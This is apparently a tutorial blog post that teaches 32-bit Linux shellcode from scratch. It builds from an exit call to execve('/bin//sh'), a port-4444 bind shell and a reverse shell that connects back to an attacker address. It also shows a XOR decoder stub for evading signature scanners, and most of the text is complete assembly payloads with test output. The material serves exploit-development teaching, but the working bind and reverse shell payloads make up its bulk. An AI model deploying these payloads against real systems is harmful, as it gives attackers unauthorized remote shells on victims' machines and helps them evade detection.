Writing a Shell Code for Linux
When you exploit a buffer overflow, you overwrite the return address to hijack the program's execution flow. But redirect it to what? You need code to execute — and that code needs to be small, self-contained, and capable of running anywhere in memory without depending on external libraries or fixed addresses.
That code is shellcode.
In this post, we'll write Linux shellcode from scratch for 32-bit x86 systems. But more importantly, we'll explain why every single line is written the way it is. Why assembly? Why XOR instead of MOV? Why //bin/sh with two slashes? Why does a CALL instruction help us find our string? Every technique has a reason, and understanding those reasons is what separates someone who copies shellcode from someone who can write their own.
Note: This tutorial is for educational purposes — understanding shellcode is essential for both exploit developers and the defenders building protections against them. Always ensure you have proper authorization before testing on any systems.
Prerequisites
Before diving in, you should have a basic understanding of:
- x86 assembly language (registers, stack operations, basic instructions)
- How the stack works (push, pop, ESP, return addresses)
- Linux system calls
- Using a terminal and debugging tools
Environment Setup
# Install the tools we'll need
sudo apt-get update
sudo apt-get install nasm gcc gdb strace
# Disable ASLR for consistent testing
# (ASLR randomizes memory addresses, making debugging harder)
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Why Assembly?
Shellcode is written in assembly because it needs to be raw machine code — no compiler, no linker, no runtime, no libc. When you inject shellcode into a vulnerable program's memory, there's no loader to resolve function addresses, no dynamic linker to load shared libraries, and no operating system setup to initialize the environment.
You write assembly, assemble it into machine code, and that sequence of bytes runs directly on the CPU. Nothing in between.
High-level languages like C compile into machine code too, but they produce code that depends on:
- The C runtime (startup code,
_start,__libc_start_main) - Shared libraries (libc for
printf,system, etc.) - Fixed memory addresses for global variables
- A properly initialized stack and heap
None of those exist in an exploit scenario. So we go as low as we can — assembly.
How Linux System Calls Work (32-bit)
Everything useful that shellcode does — writing to the screen, spawning a shell, opening a network connection — goes through system calls. Syscalls are the interface between user-space programs and the Linux kernel.
On 32-bit Linux, the calling convention is:
| Register | Purpose |
|---|---|
EAX |
System call number |
EBX |
First argument |
ECX |
Second argument |
EDX |
Third argument |
ESI |
Fourth argument |
EDI |
Fifth argument |
EBP |
Sixth argument |
After loading the registers, you trigger the syscall with int 0x80 — a software interrupt that transfers control to the kernel.
The syscalls we'll use:
| Syscall | Number | Signature |
|---|---|---|
exit |
1 | exit(int status) |
write |
4 | write(int fd, char *buf, int len) |
execve |
11 | execve(char *filename, char **argv, char **envp) |
dup2 |
63 | dup2(int oldfd, int newfd) |
socketcall |
102 | socketcall(int call, unsigned long *args) |
You can find the full list in /usr/include/asm/unistd_32.h on your Linux system.
Chapter 1: The Simplest Shellcode — exit(0)
Let's start with the absolute simplest shellcode possible: a clean exit.
section .text
global _start
_start:
mov eax, 1 ; syscall number 1 = exit
mov ebx, 0 ; exit status 0 = success
int 0x80 ; trigger the syscall
Assemble, link, and run:
$ nasm -f elf32 exit.asm -o exit.o
$ ld -m elf_i386 exit.o -o exit
$ ./exit
$ echo $?
0
It works. But there's a problem — let's look at the machine code:
$ objdump -d exit -M intel
08048060 <_start>:
8048060: b8 01 00 00 00 mov eax,0x1
8048065: bb 00 00 00 00 mov ebx,0x0
804806a: cd 80 int 0x80
See all those 00 bytes? Those are null bytes, and they're the first enemy of shellcode.
The Null Byte Problem
This is one of the most important concepts in shellcode development, so let's understand it thoroughly.
Most buffer overflow vulnerabilities involve string functions — strcpy(), strcat(), gets(), sprintf(). These functions process data until they encounter a null byte (0x00), which signals the end of the string.
If your shellcode contains a null byte at position 10, the string function stops copying at position 10. Everything after that gets truncated. Your shellcode arrives incomplete, and it won't work.
So every null byte in our shellcode must be eliminated.
Let's fix our exit shellcode:
section .text
global _start
_start:
xor eax, eax ; EAX = 0 (no null bytes!)
mov al, 1 ; AL = 1 (only sets the lowest byte of EAX)
xor ebx, ebx ; EBX = 0 (exit status)
int 0x80
Let's examine why each change matters:
xor eax, eax instead of mov eax, 0
mov eax, 0 assembles to b8 00 00 00 00 — four null bytes. xor eax, eax assembles to 31 c0 — XOR-ing a register with itself always produces zero, and the instruction contains no null bytes. This is the standard way to zero a register in shellcode.
mov al, 1 instead of mov eax, 1
mov eax, 1 assembles to b8 01 00 00 00 — three null bytes, because EAX is a 32-bit register and the value 1 needs to be zero-padded to 32 bits. But mov al, 1 assembles to b0 01 — only 2 bytes, no nulls. AL is the lowest 8 bits of EAX, and since we already zeroed EAX with XOR, setting AL to 1 makes EAX = 1 without any null bytes.
Let's verify:
$ objdump -d exit -M intel
08048060 <_start>:
8048060: 31 c0 xor eax,eax
8048062: b0 01 mov al,0x1
8048064: 31 db xor ebx,ebx
8048066: cd 80 int 0x80
No null bytes. Six bytes total. Clean.
Here's a quick reference of null-byte-free alternatives:
| Need | Bad (has nulls) | Good (null-free) |
|---|---|---|
| Set register to 0 | mov eax, 0 |
xor eax, eax |
| Set register to small value | mov eax, 5 |
xor eax, eax then mov al, 5 |
| Set register to 1 | mov eax, 1 |
xor eax, eax then inc eax |
| Push 0 to stack | push 0 |
xor eax, eax then push eax |
Chapter 2: Hello World Shellcode
Now let's write something that produces visible output — printing "Hello World!" using the write syscall.
The Naive Version
section .text
global _start
_start:
; write(1, "Hello World!\n", 13)
mov eax, 4 ; syscall 4 = write
mov ebx, 1 ; file descriptor 1 = stdout
mov ecx, msg ; pointer to the message
mov edx, 13 ; message length
int 0x80
; exit(0)
mov eax, 1
mov ebx, 0
int 0x80
section .data
msg db 'Hello World!', 0xa ; 0xa = newline
This works as a standalone program, but it cannot work as shellcode. Why?
The msg label is in the .data section, and mov ecx, msg gets assembled as mov ecx, 0x080490a4 — a hardcoded memory address. When this shellcode runs inside an exploited program, that address points to something completely different (or invalid). The shellcode crashes.
This is the position-independence problem.
Position-Independent Code — The JMP-CALL-POP Trick
Shellcode doesn't know where in memory it will land. It might be injected into a stack buffer at 0xbffff000 one time and 0xbfffe800 the next (especially with ASLR). So it cannot use any hardcoded addresses.
But we still need to reference data — our "Hello World!" string has to live somewhere, and we need its address. How do we get the address of something when we don't know where we are in memory?
The answer is the JMP-CALL-POP technique, and it's one of the most elegant tricks in shellcode development.
Here's how it works:
- JMP forward to a CALL instruction at the end of the shellcode
- The CALL instruction jumps back to the shellcode's main body
- CALL has a critical side effect: it pushes the return address onto the stack — and the return address is the address of the instruction right after the CALL
- We place our string data right after the CALL instruction
- A POP instruction retrieves that address from the stack
┌──────── JMP to call_shellcode ───────────┐
│ │
▼ │
shellcode: │
POP ECX ◄── ECX now has address of msg │
...code... │
...code... │
│
call_shellcode: ◄───────────┘
CALL shellcode ──► pushes address of next byte onto stack
db 'Hello World!', 0xa ◄── this address gets pushed!
When CALL shellcode executes, the CPU pushes the address of the next byte (the start of "Hello World!") onto the stack, then jumps to the shellcode label. The first instruction there is POP ECX, which grabs that address. Now ECX points to our string, regardless of where in memory the shellcode was loaded.
The Position-Independent Version
section .text
global _start
_start:
jmp short call_shellcode ; Step 1: jump to the CALL
shellcode:
pop ecx ; Step 3: ECX = address of "Hello World!\n"
; write(1, ecx, 13)
xor eax, eax
mov al, 4 ; syscall 4 = write
xor ebx, ebx
mov bl, 1 ; fd 1 = stdout
xor edx, edx
mov dl, 13 ; length = 13
int 0x80
; exit(0)
xor eax, eax
mov al, 1 ; syscall 1 = exit
xor ebx, ebx ; status = 0
int 0x80
call_shellcode:
call shellcode ; Step 2: pushes address of msg, jumps back
db 'Hello World!', 0xa ; Our string data — right after the CALL
Notice:
- Every register is zeroed with
XORbefore use (no null bytes) - Values are set using
AL,BL,DL(8-bit registers) instead of full 32-bitMOV - The string is not in a
.datasection — it's embedded directly in the.textsection, right after the CALL instruction - No hardcoded addresses anywhere
Extracting and Testing the Shellcode
# Assemble and link
$ nasm -f elf32 hello.asm -o hello.o
$ ld -m elf_i386 hello.o -o hello
# Test as standalone
$ ./hello
Hello World!
# Extract the raw bytes
$ objdump -d hello | grep -Po '\s\K[a-f0-9]{2}(?=\s)' | sed 's/^/\\x/' | tr -d '\n'
Now we need a way to test these bytes as actual injected shellcode. We write a C test harness — a program that treats the shellcode bytes as executable code:
#include <stdio.h>
#include <string.h>
// The shellcode bytes extracted from objdump
unsigned char shellcode[] =
"\xeb\x16" // jmp short call_shellcode
"\x59" // pop ecx
"\x31\xc0" // xor eax, eax
"\xb0\x04" // mov al, 4
"\x31\xdb" // xor ebx, ebx
"\xb3\x01" // mov bl, 1
"\x31\xd2" // xor edx, edx
"\xb2\x0d" // mov dl, 13
"\xcd\x80" // int 0x80
"\x31\xc0" // xor eax, eax
"\xb0\x01" // mov al, 1
"\x31\xdb" // xor ebx, ebx
"\xcd\x80" // int 0x80
"\xe8\xe5\xff\xff\xff" // call shellcode
"Hello World!\x0a"; // the string data
int main() {
printf("Shellcode length: %lu\n", strlen((char *)shellcode));
// Cast the shellcode array to a function pointer and call it
int (*ret)() = (int(*)())shellcode;
ret();
return 0;
}
# Compile with protections disabled
$ gcc -fno-stack-protector -z execstack -m32 test.c -o test
# Run
$ ./test
Shellcode length: 38
Hello World!
Why the special GCC flags?
-fno-stack-protector— Disables stack canaries (which would detect our buffer overflow in a real exploit)-z execstack— Makes the stack executable (modern systems mark the stack as non-executable by default, which prevents shellcode from running)-m32— Compiles for 32-bit (since our shellcode is 32-bit)
Chapter 3: Spawning a Shell — execve("/bin/sh")
This is the shellcode that gives "shellcode" its name — code that spawns a shell. The goal is to call:
execve("/bin/sh", ["/bin/sh", NULL], NULL)
This replaces the current process with /bin/sh, giving the attacker an interactive shell. Let's understand the execve syscall first.
Understanding execve
int execve(const char *filename, char *const argv[], char *const envp[]);
- filename (EBX) — Pointer to a null-terminated string:
"/bin/sh\0" - argv (ECX) — Pointer to an array of argument strings, terminated by NULL:
["/bin/sh", NULL] - envp (EDX) — Pointer to environment variables array, terminated by NULL. We'll use
NULL
So we need to construct, entirely on the stack:
- The string
"/bin/sh"followed by a null byte - An array containing a pointer to that string, followed by a NULL pointer
- The appropriate register values
The Stack Layout
Here's what we need in memory:
Low Address
┌─────────────────────┐
ESP ──► │ ptr to "/bin//sh" │ ◄── argv[0]
├─────────────────────┤
│ NULL (0x00000000) │ ◄── argv[1] (terminates argv)
├─────────────────────┤
EBX ──► │ "//bi" (0x69622f2f) │ ◄── start of string
├─────────────────────┤
│ "n/sh" (0x68732f6e) │
├─────────────────────┤
│ NULL (0x00000000) │ ◄── string terminator
└─────────────────────┘
High Address
Wait — why "//bin/sh" with two slashes instead of "/bin/sh"?
Why "//bin/sh" Instead of "/bin/sh"
"/bin/sh" is 7 characters plus a null terminator = 8 bytes. But we push data onto the stack in 4-byte (32-bit) chunks. 8 bytes = 2 pushes, and we need a separate push for the null terminator. That's 3 pushes for 8 bytes — wasteful.
"//bin/sh" is 8 characters plus a null terminator = 9 bytes. But Linux treats multiple consecutive slashes as a single slash — //bin/sh is identical to /bin/sh. Now we have exactly 8 characters, which fits perfectly into 2 PUSH instructions (4 bytes each). We push the null terminator separately, but we've saved ourselves from having to pad or align anything.
"//bin/sh" in memory (little-endian):
PUSH 0x68732f6e → "n/sh" (pushed first, ends up at higher address)
PUSH 0x69622f2f → "//bi" (pushed second, ends up at lower address)
Reading from low to high: "//bi" + "n/sh" = "//bin/sh" ✓
Remember — the stack grows downward, but strings are read forward (low to high). So we push the end of the string first.
The Assembly
section .text
global _start
_start:
; === Step 1: Clear all registers ===
; We don't know what's in these registers when our shellcode runs.
; Starting with known zero values is critical.
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
; === Step 2: Push the string "/bin//sh\0" onto the stack ===
push eax ; Push 0x00000000 — this is the null terminator
; for our string. We can't embed \x00 in the
; shellcode bytes, but pushing a zeroed register
; puts null bytes on the STACK, which is fine.
push 0x68732f6e ; Push "n/sh" (little-endian)
push 0x69622f2f ; Push "//bi" (little-endian)
; Now ESP points to "//bin/sh\0" on the stack
mov ebx, esp ; EBX = pointer to filename "/bin//sh"
; === Step 3: Build the argv array ===
; argv must be: [pointer_to_string, NULL]
; This is also built on the stack
push eax ; Push NULL — this terminates the argv array
push ebx ; Push pointer to "//bin/sh" — this is argv[0]
; Now ESP points to the argv array: [ptr, NULL]
mov ecx, esp ; ECX = pointer to argv array
; === Step 4: Set EDX (envp) ===
; EDX is already 0 (NULL) from the XOR above — no environment variables
; mov edx, eax ; (already zero, but shown for clarity)
; === Step 5: Make the syscall ===
mov al, 11 ; syscall 11 = execve
; We use AL (not EAX) to avoid null bytes
int 0x80 ; Transfer control to the kernel
; If execve succeeds, this process is replaced
; by /bin/sh — we never return here
Let's trace through the stack state at each step:
After "xor" instructions:
EAX=0, EBX=0, ECX=0, EDX=0
After "push eax":
Stack: [0x00000000]
ESP ──► ^
After "push 0x68732f6e":
Stack: [0x68732f6e] [0x00000000]
ESP ──► ^
After "push 0x69622f2f":
Stack: [0x69622f2f] [0x68732f6e] [0x00000000]
ESP ──► ^
Reading as string from ESP: "//bin/sh\0" ✓
After "mov ebx, esp":
EBX ──► "//bin/sh\0"
After "push eax" (NULL for argv terminator):
Stack: [0x00000000] [0x69622f2f] [0x68732f6e] [0x00000000]
ESP ──► ^
After "push ebx" (pointer to string):
Stack: [ptr_to_str] [0x00000000] [0x69622f2f] [0x68732f6e] [0x00000000]
ESP ──► ^
After "mov ecx, esp":
ECX ──► [ptr_to_str, NULL] (this is argv)
EBX ──► "//bin/sh\0" (this is filename)
EDX = 0 (this is envp = NULL)
EAX = 11 (syscall number)
execve("/bin/sh", ["/bin/sh", NULL], NULL) ✓
Compile and Test
$ nasm -f elf32 shell.asm -o shell.o
$ ld -m elf_i386 shell.o -o shell
$ ./shell
$ whoami
user
$ exit
You get a shell. The shellcode is about 25 bytes — small enough to fit in most buffer overflow exploits.
Check for Null Bytes
$ objdump -d shell -M intel
08048060 <_start>:
8048060: 31 c0 xor eax,eax
8048062: 31 db xor ebx,ebx
8048064: 31 c9 xor ecx,ecx
8048066: 31 d2 xor edx,edx
8048068: 50 push eax
8048069: 68 6e 2f 73 68 push 0x68732f6e
804806e: 68 2f 2f 62 69 push 0x69622f2f
8048073: 89 e3 mov ebx,esp
8048075: 50 push eax
8048076: 53 push ebx
8048077: 89 e1 mov ecx,esp
8048079: b0 0b mov al,0xb
804807b: cd 80 int 0x80
No 00 bytes anywhere. Every byte is non-null. This shellcode can safely pass through strcpy(), gets(), and any other string function.
Chapter 4: TCP Bind Shell
A bind shell is shellcode that opens a port on the target machine and waits for the attacker to connect. When someone connects, they get a shell. This is useful when the target is directly reachable from the attacker's network.
The C equivalent of what we're building:
int sockfd = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(4444);
addr.sin_addr.s_addr = INADDR_ANY;
bind(sockfd, (struct sockaddr *)&addr, sizeof(addr));
listen(sockfd, 0);
int clientfd = accept(sockfd, NULL, NULL);
// Redirect stdin/stdout/stderr to the socket
dup2(clientfd, 0); // stdin
dup2(clientfd, 1); // stdout
dup2(clientfd, 2); // stderr
execve("/bin/sh", ["/bin/sh", NULL], NULL);
That's 5 operations: socket, bind, listen, accept, dup2 (×3), then execve. In 32-bit Linux, all socket operations go through a single syscall — socketcall (number 102). The first argument (EBX) specifies which socket operation, and the second argument (ECX) is a pointer to the operation's arguments on the stack.
| EBX Value | Operation |
|---|---|
| 1 | SYS_SOCKET |
| 2 | SYS_BIND |
| 4 | SYS_LISTEN |
| 5 | SYS_ACCEPT |
| 3 | SYS_CONNECT |
The Assembly — With Explanations
section .text
global _start
_start:
; ============================================
; socket(AF_INET, SOCK_STREAM, 0)
; ============================================
; Creates a TCP socket. Returns a file descriptor in EAX.
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov al, 102 ; syscall 102 = socketcall
mov bl, 1 ; SYS_SOCKET
; Build the argument array on the stack (pushed in reverse order)
push edx ; protocol = 0 (kernel picks TCP for SOCK_STREAM)
push 1 ; SOCK_STREAM (TCP)
push 2 ; AF_INET (IPv4)
mov ecx, esp ; ECX = pointer to arguments
int 0x80 ; Returns socket fd in EAX
mov esi, eax ; Save the socket fd in ESI (we'll need it later)
; ============================================
; bind(sockfd, {AF_INET, 4444, 0.0.0.0}, 16)
; ============================================
; Binds the socket to port 4444 on all interfaces.
; We need to build a sockaddr_in struct on the stack.
xor eax, eax
mov al, 102 ; socketcall
mov bl, 2 ; SYS_BIND
; Build sockaddr_in struct on the stack
push edx ; sin_addr = 0.0.0.0 (INADDR_ANY — listen on all interfaces)
push word 0x5c11 ; sin_port = 4444 in network byte order (big-endian)
; 4444 decimal = 0x115C → big-endian = 0x5C11
push word 2 ; sin_family = AF_INET
mov ecx, esp ; ECX points to our sockaddr_in struct
; Build the argument array for bind()
push 16 ; addrlen = sizeof(sockaddr_in) = 16
push ecx ; pointer to sockaddr_in struct
push esi ; socket fd
mov ecx, esp ; ECX = pointer to arguments
int 0x80
; ============================================
; listen(sockfd, 0)
; ============================================
; Marks the socket as a passive socket that accepts connections.
; Backlog of 0 means only one pending connection at a time.
xor eax, eax
mov al, 102 ; socketcall
mov bl, 4 ; SYS_LISTEN
push edx ; backlog = 0
push esi ; socket fd
mov ecx, esp
int 0x80
; ============================================
; accept(sockfd, NULL, NULL)
; ============================================
; Waits for an incoming connection. Blocks until someone connects.
; Returns a NEW file descriptor for the connected client.
xor eax, eax
mov al, 102 ; socketcall
mov bl, 5 ; SYS_ACCEPT
push edx ; addrlen = NULL (we don't care who connected)
push edx ; addr = NULL
push esi ; socket fd
mov ecx, esp
int 0x80
mov ebx, eax ; Save client fd in EBX (needed for dup2)
; ============================================
; dup2(clientfd, 0/1/2) — redirect I/O to the socket
; ============================================
; This is the critical step. We redirect stdin (0), stdout (1),
; and stderr (2) to the client socket. After this, anything the
; shell reads comes from the network, and anything it writes
; goes back over the network.
;
; Without this step, the shell would read from the target's
; terminal and write to the target's terminal — useless to us.
xor ecx, ecx ; ECX = 0 (start with stdin)
dup_loop:
xor eax, eax
mov al, 63 ; syscall 63 = dup2
int 0x80 ; dup2(clientfd, ecx)
inc ecx ; next fd (0 → 1 → 2)
cmp cl, 3 ; done all three?
jne dup_loop ; if not, loop
; ============================================
; execve("/bin//sh", ["/bin//sh", NULL], NULL)
; ============================================
; Same technique as Chapter 3 — push string on stack, set up argv.
xor eax, eax
push eax ; null terminator for string
push 0x68732f6e ; "n/sh"
push 0x69622f2f ; "//bi"
mov ebx, esp ; EBX = pointer to "//bin/sh"
push eax ; argv terminator (NULL)
push ebx ; argv[0] = pointer to "//bin/sh"
mov ecx, esp ; ECX = pointer to argv
mov edx, eax ; EDX = NULL (no environment variables)
mov al, 11 ; syscall 11 = execve
int 0x80
Test It
# Compile
$ nasm -f elf32 bind_shell.asm -o bind_shell.o
$ ld -m elf_i386 bind_shell.o -o bind_shell
# Terminal 1 — run the bind shell
$ ./bind_shell
# Terminal 2 — connect to it
$ nc localhost 4444
whoami
user
id
uid=1000(user) gid=1000(user) groups=1000(user)
You now have a remote shell over the network.
Chapter 5: TCP Reverse Shell
A bind shell waits for connections on the target. But what if the target is behind a firewall that blocks incoming connections? The answer is a reverse shell — the target connects back to the attacker.
The difference from the bind shell is just two operations:
| Bind Shell | Reverse Shell |
|---|---|
socket() |
socket() |
bind() |
connect() |
listen() |
— |
accept() |
— |
dup2() ×3 |
dup2() ×3 |
execve() |
execve() |
Instead of bind + listen + accept, we use a single connect() to reach the attacker's machine. Much simpler.
section .text
global _start
_start:
; ============================================
; socket(AF_INET, SOCK_STREAM, 0)
; ============================================
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov al, 102 ; socketcall
mov bl, 1 ; SYS_SOCKET
push edx ; protocol = 0
push 1 ; SOCK_STREAM
push 2 ; AF_INET
mov ecx, esp
int 0x80
mov esi, eax ; save socket fd
; ============================================
; connect(sockfd, {AF_INET, 4444, 127.0.0.1}, 16)
; ============================================
; Connect back to the attacker's machine.
; Change the IP address to your attacker machine's IP.
xor eax, eax
mov al, 102 ; socketcall
mov bl, 3 ; SYS_CONNECT
; Build sockaddr_in on the stack
push 0x0100007f ; sin_addr = 127.0.0.1 in network byte order
; 127 = 0x7f, 0 = 0x00, 0 = 0x00, 1 = 0x01
; Stored as: 0x0100007f (little-endian representation
; of the big-endian IP)
;
; WARNING: This contains null bytes (0x00)!
; For a real exploit, you'd need a different IP
; like 10.10.10.1 (0x010a0a0a) that has no nulls.
push word 0x5c11 ; sin_port = 4444
push word 2 ; sin_family = AF_INET
mov ecx, esp
push 16 ; addrlen
push ecx ; sockaddr struct
push esi ; socket fd
mov ecx, esp
int 0x80
; ============================================
; dup2(sockfd, 0/1/2)
; ============================================
mov ebx, esi ; socket fd (the CONNECTED socket, not a client fd)
xor ecx, ecx
dup_loop:
xor eax, eax
mov al, 63
int 0x80
inc ecx
cmp cl, 3
jne dup_loop
; ============================================
; execve("//bin/sh", ["//bin/sh", NULL], NULL)
; ============================================
xor eax, eax
push eax
push 0x68732f6e
push 0x69622f2f
mov ebx, esp
push eax
push ebx
mov ecx, esp
mov edx, eax
mov al, 11
int 0x80
Test It
# Terminal 1 — attacker listens for the callback
$ nc -lvp 4444
Listening on 0.0.0.0 4444
# Terminal 2 — run the reverse shell (on the "target")
$ ./reverse_shell
# Back in Terminal 1 — a shell appears
Connection received on 127.0.0.1 54321
whoami
user
About the null bytes in the IP address: 127.0.0.1 contains null bytes (0x00). In a real exploit, you'd use an attacker IP that doesn't contain null bytes (like 10.10.10.1 = 0x010a0a0a), or encode the shellcode to avoid the issue.
Shellcode Optimization Techniques
Size Matters
Smaller shellcode = more likely to fit in the available buffer. Every byte counts. Some tricks:
; Instead of two instructions to zero and set:
xor eax, eax ; 2 bytes
mov al, 11 ; 2 bytes (total: 4 bytes)
; Sometimes you can use:
push 11 ; 2 bytes
pop eax ; 1 byte (total: 3 bytes)
; CDQ: if EAX is positive, sets EDX to 0
; (sign-extends EAX into EDX:EAX)
xor eax, eax ; 2 bytes
cdq ; 1 byte — EDX is now 0 too (saves "xor edx, edx")
; MUL: multiplying by zero zeroes both EAX and EDX
xor ecx, ecx ; 2 bytes
mul ecx ; 2 bytes — EAX=0, EDX=0 (zeroed two registers with one trick)
Polymorphic Shellcode
Advanced shellcode can encode itself to evade signature-based detection. A small decoder stub at the beginning decodes the rest of the shellcode at runtime:
decoder:
jmp short get_shellcode
decode:
pop esi ; ESI = address of encoded shellcode
xor ecx, ecx
mov cl, SHELLCODE_LEN ; length of encoded shellcode
decode_loop:
xor byte [esi], 0xAA ; XOR each byte with key 0xAA
inc esi
loop decode_loop
jmp short encoded_shellcode
get_shellcode:
call decode
encoded_shellcode:
; ... XOR-encoded bytes here ...
The encoded shellcode looks nothing like the original, so signature scanners won't recognize it. At runtime, the decoder XORs each byte with the key to reveal the real shellcode, then jumps to it.
Testing and Debugging
Using GDB
GDB is essential for stepping through shellcode instruction by instruction:
$ gdb ./test
(gdb) set disassembly-flavor intel
(gdb) break *&shellcode # Break at the start of our shellcode array
(gdb) run
(gdb) x/20i $eip # Disassemble next 20 instructions
(gdb) info registers # Show all register values
(gdb) si # Step one instruction
(gdb) x/16xb $esp # Examine 16 bytes at the stack pointer
Using strace
strace shows you every syscall the shellcode makes — invaluable for verifying it's doing what you expect:
$ strace ./test
execve("./test", ["./test"], 0x7fff...) = 0
...
write(1, "Hello World!\n", 13) = 13
exit(0) = ?
Checking for Null Bytes
# Show any instructions containing null bytes
$ objdump -d shell | grep '00'
If you see 00 in the hex dump of any instruction, that instruction needs to be rewritten.
Final Thoughts
Writing shellcode teaches you things that no other exercise can. You learn how the CPU actually executes instructions, how the stack really works, how system calls bridge user space and kernel space, and how strings and data structures look in raw memory. Every byte matters. Every instruction has consequences.
The progression we followed — exit → hello world → shell spawn → bind shell → reverse shell — mirrors how real exploit payloads are built. You start with something simple, verify it works, then add complexity one layer at a time. And at every step, the constraints (no null bytes, position-independent, small size) force you to think creatively about how to achieve your goal within tight limits.
If you want to go deeper, try these challenges:
- Write a reverse shell that avoids all bad characters, not just null bytes (some exploits filter
\x0a,\x0d,\xff, etc.) - Write a staged shellcode — a tiny first stage that downloads and executes a larger second stage
- Port these examples to 64-bit (x86_64 uses
syscallinstead ofint 0x80, and the register convention is different) - Write shellcode for a different architecture — ARM or MIPS
Happy hacking.